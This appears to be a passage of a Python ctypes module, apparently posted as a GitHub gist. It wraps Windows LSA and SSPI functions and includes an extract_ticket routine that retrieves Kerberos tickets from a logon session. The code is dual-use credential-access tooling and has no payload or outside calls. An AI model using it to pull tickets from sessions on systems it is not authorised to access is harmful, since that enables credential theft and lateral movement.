    return req
class KERB_RETRIEVE_TKT_REQUEST(Structure):
    """Ticket-retrieval request whose target name lives in a separate buffer."""

    _fields_ = [
        ("MessageType", DWORD),
        ("LogonId", LUID),
        ("TargetName", LSA_UNICODE_STRING),
        ("TicketFlags", ULONG),
        ("CacheOptions", ULONG),
        ("EncryptionType", LONG),
        ("CredentialsHandle", PVOID),
    ]

    def __init__(
        self,
        targetname,
        ticketflags=0x0,
        cacheoptions=0x8,
        encryptiontype=0x0,
        logonid=0,
    ):
        """Populate every field of the request.

        :param targetname: text stored through ``LSA_UNICODE_STRING.from_string``.
        :param ticketflags: value for ``TicketFlags``.
        :param cacheoptions: value for ``CacheOptions``.
        :param encryptiontype: value for ``EncryptionType``.
        :param logonid: ``LUID`` instance, or an int converted with
            ``LUID.from_int``.
        """
        if isinstance(logonid, int):
            logonid = LUID.from_int(logonid)
        message_type = KERB_PROTOCOL_MESSAGE_TYPE.KerbRetrieveEncodedTicketMessage.value
        target = LSA_UNICODE_STRING.from_string(targetname)
        # CredentialsHandle is always left NULL.
        Structure.__init__(
            self,
            message_type,
            logonid,
            target,
            ticketflags,
            cacheoptions,
            encryptiontype,
            None,
        )
def retrieve_tkt_helper(
    targetname,
    logonid=0,
    ticketflags=0x0,
    cacheoptions=0x8,
    encryptiontype=0x0,
    temp_offset=0,
):
    """Build a ticket-retrieval request with the target name stored inline.

    A one-off structure type is declared per call so the NUL-terminated
    UTF-16-LE name can sit at the end of the same allocation; ``TargetName``
    then points back into the request itself.

    :param targetname: target name text.
    :param logonid: ``LUID`` instance, or an int converted with ``LUID.from_int``.
    :param ticketflags: value for ``TicketFlags``.
    :param cacheoptions: value for ``CacheOptions``.
    :param encryptiontype: value for ``EncryptionType``.
    :param temp_offset: accepted but not used.
    :returns: the populated request structure.
    """
    if isinstance(logonid, int):
        logonid = LUID.from_int(logonid)

    name_bytes = targetname.encode("utf-16-le")
    name_with_nul = name_bytes + b"\x00\x00"
    alloc_len = len(name_with_nul)
    name_array_type = c_byte * alloc_len

    class KERB_RETRIEVE_TKT_REQUEST(Structure):
        _fields_ = [
            ("MessageType", DWORD),
            ("LogonId", LUID),
            ("TargetName", LSA_UNICODE_STRING),
            ("TicketFlags", ULONG),
            ("CacheOptions", ULONG),
            ("EncryptionType", LONG),
            ("CredentialsHandle", PVOID),
            ("UNK", PVOID),
            ("TargetNameData", name_array_type),
        ]

    req = KERB_RETRIEVE_TKT_REQUEST()
    req.MessageType = KERB_PROTOCOL_MESSAGE_TYPE.KerbRetrieveEncodedTicketMessage.value
    req.LogonId = logonid
    req.TicketFlags = ticketflags
    req.CacheOptions = cacheoptions
    req.EncryptionType = encryptiontype
    req.TargetNameData = name_array_type(*name_with_nul)

    # Locate the inline name: step back alloc_len bytes from the end of the
    # structure, then round down to a pointer-size boundary.
    # NOTE(review): the rounding presumably cancels trailing padding that
    # sizeof() includes after TargetNameData; confirm.
    pointer_size = sizeof(c_void_p)
    unaligned_start = addressof(req) + sizeof(req) - alloc_len
    aligned_start = unaligned_start - (unaligned_start % pointer_size)

    lsa_target = LSA_UNICODE_STRING()
    lsa_target.Length = len(name_bytes)
    lsa_target.MaximumLength = alloc_len
    lsa_target.Buffer = cast(aligned_start, POINTER(c_char))
    req.TargetName = lsa_target
    return req
class KERB_RETRIEVE_TKT_RESPONSE(Structure):
    """Response wrapper holding a single ``KERB_EXTERNAL_TICKET``."""

    _fields_ = [("Ticket", KERB_EXTERNAL_TICKET)]
# INVALID_HANDLE_VALUE is the all-ones pointer value: what c_void_p(-1) reads
# back as. If ctypes rejects -1 with TypeError, the same value is computed
# from the pointer width (4 or 8 bytes only).
try:
    INVALID_HANDLE_VALUE = c_void_p(-1).value
except TypeError:
    if sizeof(c_void_p) not in (4, 8):
        raise
    INVALID_HANDLE_VALUE = (1 << (8 * sizeof(c_void_p))) - 1
def get_lsa_error(ret_status):
    """Return (without raising) the ``WinError`` for status ``ret_status``.

    The status is first converted with ``LsaNtStatusToWinError``.
    """
    win_error_code = LsaNtStatusToWinError(ret_status)
    return WinError(win_error_code)
def LsaRaiseIfNotErrorSuccess(result, func=None, arguments=()):
    """ctypes ``errcheck`` hook: pass ``ERROR_SUCCESS`` through, raise otherwise.

    :param result: value returned by the foreign function.
    :param func: unused; present for the errcheck signature.
    :param arguments: unused; present for the errcheck signature.
    :returns: ``result`` when it equals ``ERROR_SUCCESS``.
    :raises OSError: the ``WinError`` built from the converted status.
    """
    if result == ERROR_SUCCESS:
        return result
    raise WinError(LsaNtStatusToWinError(result))
def LsaNtStatusToWinError(errcode):
    """Convert status ``errcode`` via Advapi32 ``LsaNtStatusToWinError``.

    :param errcode: status value to convert.
    :returns: the converted error code.
    :raises Exception: when the conversion yields 0x13D, which the message
        labels ERROR_MR_MID_NOT_FOUND.
    """
    convert = windll.Advapi32.LsaNtStatusToWinError
    convert.argtypes = [NTSTATUS]
    convert.restype = ULONG

    win_error = convert(errcode)
    if win_error == 0x13D:
        raise Exception("ERROR_MR_MID_NOT_FOUND for %s" % errcode)
    return win_error
def LsaFreeReturnBuffer(pbuffer):
    """Release ``pbuffer`` through Secur32 ``LsaFreeReturnBuffer``.

    :param pbuffer: pointer to free.
    :raises OSError: via ``LsaRaiseIfNotErrorSuccess`` on a non-success status.
    """
    free_buffer = windll.Secur32.LsaFreeReturnBuffer
    free_buffer.argtypes = [PVOID]
    free_buffer.restype = NTSTATUS
    free_buffer.errcheck = LsaRaiseIfNotErrorSuccess
    free_buffer(pbuffer)
def LsaConnectUntrusted():
    """Call Secur32 ``LsaConnectUntrusted`` and return the handle it fills in.

    :returns: ``HANDLE`` instance written by the call.
    :raises OSError: via ``LsaRaiseIfNotErrorSuccess`` on a non-success status.
    """
    connect = windll.Secur32.LsaConnectUntrusted
    connect.argtypes = [PHANDLE]
    connect.restype = NTSTATUS
    connect.errcheck = LsaRaiseIfNotErrorSuccess

    # Starts as the invalid-handle value and is overwritten by the call.
    handle = HANDLE(INVALID_HANDLE_VALUE)
    connect(byref(handle))
    return handle
def LsaLookupAuthenticationPackage(lsa_handle, package_name):
    """Look up a package id through Secur32 ``LsaLookupAuthenticationPackage``.

    :param lsa_handle: handle passed as the first argument of the call.
    :param package_name: package name as ``bytes``, or ``str`` (encoded with
        the default codec).
    :returns: the package id as an int.
    :raises OSError: via ``LsaRaiseIfNotErrorSuccess`` on a non-success status.
    """
    lookup = windll.Secur32.LsaLookupAuthenticationPackage
    lookup.argtypes = [HANDLE, PLSA_STRING, PULONG]
    lookup.restype = NTSTATUS
    lookup.errcheck = LsaRaiseIfNotErrorSuccess

    if isinstance(package_name, str):
        package_name = package_name.encode()
    name_len = len(package_name)

    pname = LSA_STRING()
    # create_string_buffer appends a NUL, hence MaximumLength = Length + 1.
    pname.Buffer = create_string_buffer(package_name)
    pname.Length = name_len
    pname.MaximumLength = name_len + 1

    package_id = ULONG(0)
    lookup(lsa_handle, byref(pname), byref(package_id))
    return package_id.value
def LsaCallAuthenticationPackage(lsa_handle, package_id, message):
    """Send ``message`` to a package via Secur32 ``LsaCallAuthenticationPackage``.

    :param lsa_handle: handle passed as the first argument of the call.
    :param package_id: package id passed as the second argument.
    :param message: request, either a ctypes ``Structure`` or any object
        convertible with ``bytes()``.
    :returns: ``(return_msg, return_status, free_ptr)``: a bytes copy of the
        returned buffer (``b""`` if its reported length is zero), the protocol
        status value, and the pointer to the returned buffer (``None`` if its
        reported length is zero) for the caller to release.
    :raises OSError: via ``LsaRaiseIfNotErrorSuccess`` when the call itself
        returns a non-success value.
    """
    call_package = windll.Secur32.LsaCallAuthenticationPackage
    call_package.argtypes = [
        HANDLE,
        ULONG,
        PVOID,
        ULONG,
        PVOID,
        PULONG,
        PNTSTATUS,
    ]
    call_package.restype = DWORD
    call_package.errcheck = LsaRaiseIfNotErrorSuccess

    if not isinstance(message, Structure):
        # byref() only accepts ctypes instances, so a bytes-like message is
        # copied into a ctypes buffer first (byref(bytes) raises TypeError).
        raw_message = bytes(message)
        message = create_string_buffer(raw_message, len(raw_message))
    message_len = sizeof(message)

    return_msg_p = c_void_p()
    return_msg_len = ULONG(0)
    return_status = NTSTATUS(INVALID_HANDLE_VALUE)
    call_package(
        lsa_handle,
        package_id,
        byref(message),
        message_len,
        byref(return_msg_p),
        byref(return_msg_len),
        byref(return_status),
    )

    return_msg = b""
    free_ptr = None
    if return_msg_len.value > 0:
        return_msg = string_at(return_msg_p, return_msg_len.value)
        free_ptr = return_msg_p
    return return_msg, return_status.value, free_ptr
def AcquireCredentialsHandle(
    client_name, package_name, tragetspn, cred_usage, pluid=None, authdata=None
):
    """Call Secur32 ``AcquireCredentialsHandleA`` and return the handle.

    :param client_name: principal name (ASCII-encoded), or a falsy value to
        pass NULL.
    :param package_name: package name (ASCII-encoded).
    :param tragetspn: accepted but not used by this function.
    :param cred_usage: credential-use value passed as a ULONG.
    :param pluid: optional logon-id pointer, passed through.
    :param authdata: optional auth-data pointer, passed through.
    :returns: the ``CredHandle`` filled in by the call.
    :raises Exception: when the call returns a status other than ``SEC_E.OK``.
    """

    def errc(result, func, arguments):
        # errcheck hook: anything but SEC_E.OK is turned into an exception.
        if SEC_E(result) != SEC_E.OK:
            raise Exception(
                "%s failed with error code %s (%s)"
                % ("AcquireCredentialsHandle", result, SEC_E(result))
            )
        return result

    acquire = windll.Secur32.AcquireCredentialsHandleA
    acquire.argtypes = [
        PSEC_CHAR,
        PSEC_CHAR,
        ULONG,
        PLUID,
        PVOID,
        PVOID,
        PVOID,
        PCredHandle,
        PTimeStamp,
    ]
    acquire.restype = DWORD
    acquire.errcheck = errc

    cn = LPSTR(client_name.encode("ascii")) if client_name else None
    pn = LPSTR(package_name.encode("ascii"))

    creds = CredHandle()
    ts = TimeStamp()
    acquire(cn, pn, cred_usage, pluid, authdata, None, None, byref(creds), byref(ts))
    return creds
def QueryContextAttributes(ctx, attr, sec_struct):
    """Fill ``sec_struct`` in place via Secur32 ``QueryContextAttributesW``.

    :param ctx: context handle structure, passed by reference.
    :param attr: enum member whose ``.value`` selects the attribute.
    :param sec_struct: ctypes structure that receives the result.
    :returns: ``None``; the result is written into ``sec_struct``.
    :raises Exception: when the call returns a status other than ``SEC_E.OK``.
    """

    def errc(result, func, arguments):
        # errcheck hook: anything but SEC_E.OK is turned into an exception.
        status = SEC_E(result)
        if status != SEC_E.OK:
            raise Exception(
                "%s failed with error code %s (%s)"
                % ("QueryContextAttributes", result, status)
            )
        return status

    query = windll.Secur32.QueryContextAttributesW
    query.argtypes = [PCtxtHandle, ULONG, PVOID]
    query.restype = DWORD
    query.errcheck = errc
    query(byref(ctx), attr.value, byref(sec_struct))
def InitializeSecurityContext(
    creds,
    target,
    ctx=None,
    flags=ISC_REQ.INTEGRITY
    | ISC_REQ.CONFIDENTIALITY
    | ISC_REQ.SEQUENCE_DETECT
    | ISC_REQ.REPLAY_DETECT,
    TargetDataRep=0,
    token=None,
):
    """Call Secur32 ``InitializeSecurityContextA`` once and return its outputs.

    :param creds: credential handle structure, passed by reference.
    :param target: target name (ASCII-encoded), or a falsy value to pass NULL.
    :param ctx: existing context handle; when falsy a new ``CtxtHandle`` is
        created and NULL is passed as the current context.
    :param flags: request flags, converted with ``int()``.
    :param TargetDataRep: passed through unchanged.
    :param token: input token bytes; when truthy it is wrapped in a
        one-buffer ``SecBufferDesc``, otherwise NULL is passed.
    :returns: ``(status, ctx, data, output_flags, expiry)`` where ``status``
        is a ``SEC_E`` member, ``data`` is the ``Buffers`` list of the output
        descriptor and ``output_flags`` is wrapped in ``ISC_REQ``.
    :raises Exception: when the returned status is not one of the accepted
        ones listed in ``errc``.
    """

    def errc(result, func, arguments):
        # errcheck hook: these statuses are handed back to the caller,
        # everything else is turned into an exception.
        status = SEC_E(result)
        accepted = (
            SEC_E.OK,
            SEC_E.COMPLETE_AND_CONTINUE,
            SEC_E.COMPLETE_NEEDED,
            SEC_E.CONTINUE_NEEDED,
            SEC_E.INCOMPLETE_CREDENTIALS,
        )
        if status in accepted:
            return status
        raise Exception(
            "%s failed with error code %s (%s)"
            % ("InitializeSecurityContext", result, status)
        )

    init_ctx = windll.Secur32.InitializeSecurityContextA
    init_ctx.argtypes = [
        PCredHandle,
        PCtxtHandle,
        PSEC_CHAR,
        ULONG,
        ULONG,
        ULONG,
        PSecBufferDesc,
        ULONG,
        PCtxtHandle,
        PSecBufferDesc,
        PULONG,
        PTimeStamp,
    ]
    init_ctx.restype = DWORD
    init_ctx.errcheck = errc

    ptarget = LPSTR(target.encode("ascii")) if target else None

    newbuf = SecBufferDesc()
    outputflags = ULONG()
    expiry = TimeStamp()

    if token:
        token = SecBufferDesc([SecBuffer(token)])

    # First call: no current context, and a fresh handle receives the new
    # one. Later calls: the same handle is both input and output.
    if not ctx:
        ctx = CtxtHandle()
        current_ctx = None
    else:
        current_ctx = byref(ctx)

    res = init_ctx(
        byref(creds),
        current_ctx,
        ptarget,
        int(flags),
        0,
        TargetDataRep,
        byref(token) if token else None,
        0,
        byref(ctx),
        byref(newbuf),
        byref(outputflags),
        byref(expiry),
    )
    data = newbuf.Buffers
    return res, ctx, data, ISC_REQ(outputflags.value), expiry
def extract_ticket(lsa_handle, package_id, luid, target_name):
    """Retrieve the ticket for ``target_name`` from a logon session.

    :param lsa_handle: handle passed to ``LsaCallAuthenticationPackage``.
    :param package_id: package id passed to ``LsaCallAuthenticationPackage``.
    :param luid: logon id forwarded to ``retrieve_tkt_helper``.
    :param target_name: target name forwarded to ``retrieve_tkt_helper``.
    :returns: the dict from ``KERB_EXTERNAL_TICKET.get_data()``, or ``{}``
        when the call returned no data.
    :raises OSError: the ``WinError`` for a non-zero protocol status.
    """
    message = retrieve_tkt_helper(target_name, logonid=luid)
    ret_msg, ret_status, free_ptr = LsaCallAuthenticationPackage(
        lsa_handle, package_id, message
    )
    try:
        if ret_status != 0:
            raise WinError(LsaNtStatusToWinError(ret_status))
        if len(ret_msg) == 0:
            return {}
        resp = KERB_RETRIEVE_TKT_RESPONSE.from_buffer_copy(ret_msg)
        # get_data() dereferences addresses stored in the response
        # (presumably pointing into the returned buffer), so it must run
        # before that buffer is released below.
        return resp.Ticket.get_data()
    finally:
        # Release the returned buffer on every path, including a non-zero
        # status or a parsing failure, which previously leaked it.
        if free_ptr is not None:
            LsaFreeReturnBuffer(free_ptr)
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment